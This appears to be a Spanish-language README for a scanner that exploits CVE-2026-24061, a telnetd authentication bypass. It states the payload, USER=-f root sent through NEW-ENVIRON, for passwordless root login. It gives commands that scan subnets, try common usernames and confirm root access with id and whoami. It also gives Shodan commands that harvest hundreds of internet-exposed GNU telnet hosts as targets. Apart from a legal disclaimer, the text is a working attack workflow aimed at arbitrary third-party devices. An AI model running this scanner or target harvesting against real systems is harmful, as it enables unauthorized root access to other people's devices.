
Escanea en busca de CVE-2026-24061, una omisión de autenticación en telnetd, generando payloads y verificando el acceso root en dispositivos GNU inetutils telnetd vulnerables.
⚠️ AVISO LEGAL MUY IMPORTANTE ⚠️
Esta herramienta es exclusivamente para fines educativos, investigación de seguridad, análisis de vulnerabilidades y pruebas autorizadas.
USER=-f root (o variaciones) mediante la opción NEW-ENVIRON permite inicio de sesión inmediato como root sin contraseña.Este escáner solo fue posible gracias al excelente análisis técnico y prueba de concepto publicada por el equipo de Hakai Security.
Su artículo detallado proporcionó las bases técnicas precisas sobre el vector de explotación, los payloads reales y el comportamiento del telnetd vulnerable.
→ Lee el análisis completo aquí:
https://hakaisecurity.io/cve-2026-24061-execucao-remota-de-codigo-no-telnetd-analise-tecnica-e-prova-de-conceito/research-blog/
Muchas gracias a Hakai Security por la transparencia, calidad técnica y contribución a la comunidad de seguridad. Ayudaron a hacer esta herramienta más precisa y útil para la investigación responsable.
--users (por defecto incluye root, admin, pi, ubuntu, debian, etc.)id y whoami (--verify)-w)# Recomendado: usa virtualenv
python3 -m venv venv-cve
source venv-cve/bin/activate
# Instala dependencias
pip install telnetlib3 colorama
python3 scan-cve-2026-24061.py 192.168.1.0/24 --verify --banner -w 50
# Con lista de objetivos (ej: Shodan)
python3 scan-cve-2026-24061.py alvos.txt -w 80 -t 6 --users root admin -o resultados.json
# Enfocado en root (más rápido)
python3 scan-cve-2026-24061.py 10.0.0.0/24 --users root --verify --banner -t 5
# Dry-run (solo lista IPs)
python3 scan-cve-2026-24061.py 206.42.41.0/24 --dry-run
pip install shodan
# Inicializa con tu API Key
shodan init TU_API_KEY_AQUI
# Descarga posibles objetivos
shodan download --limit 500 iot-gnu-telnet.json.gz 'port:23 ("GNU inetutils" OR "telnetd (GNU inetutils)") -ssh'
# Extrae IPs
shodan parse --fields ip_str iot-gnu-telnet.json.gz > alvos.txt
# Escaneo
python3 scan-cve-2026-24061.py alvos.txt --verify --banner
Las pull requests son bienvenidas, siempre que mantengan el enfoque ético y refuercen los avisos de responsabilidad. Licencia MIT License – pero refuerzo: el uso no autorizado es responsabilidad exclusiva del usuario. Hecho para estudio, concienciación e investigación de seguridad.
⭐ Si te resultó útil, ¡dale una estrella!
🛡️ Úsala con extrema responsabilidad.
Made with ❤️ by killsystema